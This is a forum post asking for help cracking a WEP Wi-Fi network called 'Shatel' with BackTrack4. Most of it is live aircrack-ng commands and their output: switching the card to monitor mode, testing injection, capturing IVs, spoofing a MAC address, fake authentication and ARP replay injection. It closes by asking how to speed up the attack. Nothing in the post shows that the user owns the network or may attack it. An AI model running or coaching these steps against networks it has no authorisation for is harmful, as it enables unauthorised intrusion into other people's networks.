Low #/s

[Hoom@n]

I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.

My wireless card was:

Code:

root@bt:~# airmon-ng


Interface       Chipset         Driver

wlan0           Intel 4965/5xxx iwlagn - [phy0]

I changed it to monitor mode:

Code:

root@bt:~# airmon-ng start wlan0 6


Interface       Chipset         Driver

wlan0           Intel 4965/5xxx iwlagn - [phy0]
                                (monitor mode enabled on mon0)

And then I test injection:

Code:

root@bt:~# aireplay-ng -9 mon0
20:59:17  Trying broadcast probe requests...
20:59:17  Injection is working!
20:59:19  Found 1 AP

20:59:19  Trying directed probe requests...
20:59:19  00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21  Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21  30/30: 100%

Then I started collecting IVs:

Code:

root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B  -w output  mon0


CH  6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:F8:84:31:1B  -21 100     8943      178    0   6  54   WEP  WEP    OPN  Shatel

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:23:F8:84:31:1B  00:24:D6:11:62:18    0    0 - 1      0   411384

And then I made a fake authentication:

Code:

root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)

root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45  Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6

21:17:45  Sending Authentication Request (Open System) [ACK]
21:17:45  Authentication successful
21:17:45  Sending Association Request [ACK]
21:17:45  Association successful :-) (AID: 1)

21:17:55  Sending keep-alive packet

And finally I started injection:

Code:

root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51  Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)

But injection didn't make any change in the speed of collecting packets(#/s).

I did this again:

Code:

root@bt:~# aireplay-ng -9 mon0
21:22:49  Trying broadcast probe requests...
21:22:51  No Answer...
21:22:51  Found 3 APs

21:22:51  Trying directed probe requests...
21:22:51  00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57   0/30:   0%

21:22:57  00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03   0/30:   0%

21:23:03  00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09   0/30:   0%

and it seems that injection is not working!

What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)

Thanks!